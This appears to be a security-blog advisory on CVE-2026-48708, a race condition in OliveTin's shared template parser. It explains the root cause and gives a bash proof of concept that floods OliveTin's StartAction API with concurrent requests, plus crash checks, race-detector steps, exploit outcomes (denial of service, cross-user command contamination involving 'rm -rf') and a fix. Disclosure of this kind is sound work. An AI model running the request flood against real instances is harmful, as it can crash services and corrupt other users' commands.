Listen to this Post
How CVE-2026-48708 Works
OliveTin is a web interface that allows users to trigger predefined shell commands. To render dynamic command arguments, its template engine uses Go’s `text/template` package.
The root cause of this vulnerability lies in a shared, package-level `template.Template` instance, named tpl, defined in service/internal/tpl/templates.go. This single instance is used globally across all incoming requests.
Each time an action is executed, the `parseTemplate` function calls `tpl.Parse(source)` to compile the action’s specific template string, followed by `t.Execute()` to render it with the provided arguments. The critical flaw is that `tpl.Parse()` modifies the shared `tpl` object in place and returns the same pointer.
In OliveTin, each `ExecRequest` is handled in a new goroutine. When two or more actions are executed concurrently, a race condition occurs on this shared `tpl` instance:
1. Goroutine A calls `tpl.Parse()` for its template (e.g., "echo {{ .name }}"), setting the shared template tree to Template A.
2. Goroutine B calls `tpl.Parse()` for its template (e.g., "rm -rf {{ .path }}"), overwriting the shared template tree to Template B.
3. Goroutine A then calls `t.Execute()` with its own data. However, because the shared template tree was overwritten by Goroutine B, it executes Template B with Data A.
This unsafe pattern leads to several severe consequences:
- Cross-User Command Contamination: Arguments from one user’s request can be rendered into another user’s shell command template, leading to the execution of unintended and potentially dangerous commands.
- Go Runtime Panic: Concurrent modifications to the template’s internal structures, such as the
tmpl mapTemplate</code>, trigger an unrecoverable <code>fatal error: concurrent map writes</code>, crashing the entire OliveTin process.</li> <li>Incorrect Command Execution: A mismatch between the template and the data can cause commands to fail or execute with the wrong parameters. The vulnerability is present in all versions up to and including `3000.0.0` and is classified under CWE-362 (Race Condition) and CWE-567 (Unsynchronized Access to Shared Data). The issue was addressed in version <code>3000.13.0</code>.</li> </ul> <h2 style="color: blue;">DailyCVE Form</h2> Platform: OliveTin Version: <= 3000.0.0 Vulnerability: Concurrent Template Parsing Severity: High (7.5 CVSS) date: 2026-06-15 <h2 style="color: blue;">Prediction: Already Patched (3000.13.0)</h2> <h2 style="color: blue;">What Undercode Say</h2> <h2 style="color: blue;">Analytics:</h2> <ul> <li>Root Cause Analysis: The vulnerability stems from a violation of Go's `text/template` concurrency safety rule. The documentation explicitly states that a <code>Template</code>'s `Parse` method must not be called concurrently. OliveTin's design ignored this, leading to a classic data race.</li> <li>Code Smell: The presence of a shared, mutable package-level variable (<code>tpl</code>) without any synchronization (mutex, atomic operations) is a significant code smell and a primary indicator of this vulnerability class.</li> <li>Exploitability: While exploitation requires precise timing to trigger the race condition, it is highly feasible under normal load. An attacker can simply send a high volume of concurrent requests to maximize the race window.</li> <li>Fix Verification: The recommended fix—creating a new template instance per `Parse` call—is the correct approach. It eliminates the shared state and is a standard, safe practice for concurrent template rendering.</li> </ul> <h2 style="color: blue;">Bash Commands & Codes:</h2> <h2 style="color: blue;">1. Trigger Concurrent Executions (Bash)</h2> [bash] !/bin/bash Fire 50 concurrent requests to maximize race window for i in $(seq 1 50); do curl -s -X POST http://127.0.0.1:1337/api/StartAction \ -H 'Content-Type: application/json' \ -d '{"bindingId":"safe-echo","arguments":[{"name":"name","value":"Alice"}]}' & curl -s -X POST http://127.0.0.1:1337/api/StartAction \ -H 'Content-Type: application/json' \ -d '{"bindingId":"file-delete","arguments":[{"name":"target","value":"test"}]}' & done wait echo "All requests sent"2. Check for Crash
If OliveTin crashed due to concurrent map writes: curl -s http://127.0.0.1:1337/readyz Expected: Connection refused (process crashed)
3. Check Logs for Contamination
Look for mismatched template executions in the OliveTin logs grep -E "missingkey|Error executing template|concurrent" /var/log/olivetin.log
4. Go Race Detector Verification
cd service go run -race . & Then trigger concurrent requests — the race detector will confirm the data race
Expected output:
WARNING: DATA RACE Write by goroutine X: text/template.(Template).Parse() service/internal/tpl/templates.go:XX Previous read by goroutine Y: text/template.(Template).Execute() service/internal/tpl/templates.go:XX
Exploit
- Prerequisites: An OliveTin instance (version <= 3000.0.0) with at least two configured actions and network accessibility.
- Attack Vector: An unauthenticated or low-privilege attacker can send a large number of concurrent API requests to trigger the race condition.
- Outcome 1: Denial of Service (DoS). The race can cause a `fatal error: concurrent map writes` in Go's runtime, crashing the entire OliveTin process and making it unavailable.
- Outcome 2: Command Contamination. An attacker's arguments can be injected into another user's command template. For example, if User A triggers a safe `echo` command and User B triggers a destructive `rm -rf` command, a race could cause User A's arguments to be executed in the context of User B's `rm -rf` command, leading to unintended data loss or system compromise.
Protection
- Immediate Action: Upgrade to OliveTin version 3000.13.0 or later, which contains the official patch for this vulnerability.
- Code-Level Fix (For Developers): The vulnerability is fixed by ensuring template parsing is thread-safe. The recommended approach is to create a new, isolated template instance for each parse call instead of reusing a shared one.
// Recommended fix: Create a new template per parse call func parseTemplate(source string, data any) (string, error) { t, err := template.New(""). Option("missingkey=error"). Funcs(template.FuncMap{"Json": jsonFunc}). Parse(source) if err != nil { return "", err } var sb strings.Builder err = t.Execute(&sb, data) // ... } - Workaround (If Patching is Not Possible): As a temporary measure, a mutex can be added around the `parseTemplate` function to serialize all template rendering. However, this will significantly harm performance and is not a recommended long-term solution.
Impact
- Confidentiality: An attacker might be able to cause a user's command arguments (which could contain sensitive data like passwords or API keys) to be rendered in another user's action output, leading to data leakage.
- Integrity: Cross-user command contamination allows an attacker to influence the execution of commands for other users, potentially causing them to perform unintended and harmful actions on the system.
- Availability: The `concurrent map writes` panic results in a complete crash of the OliveTin service, leading to a denial of service for all users.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by ThousandsSources:
Reported By: github.com
Extra Source Hub:
Undercode🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:
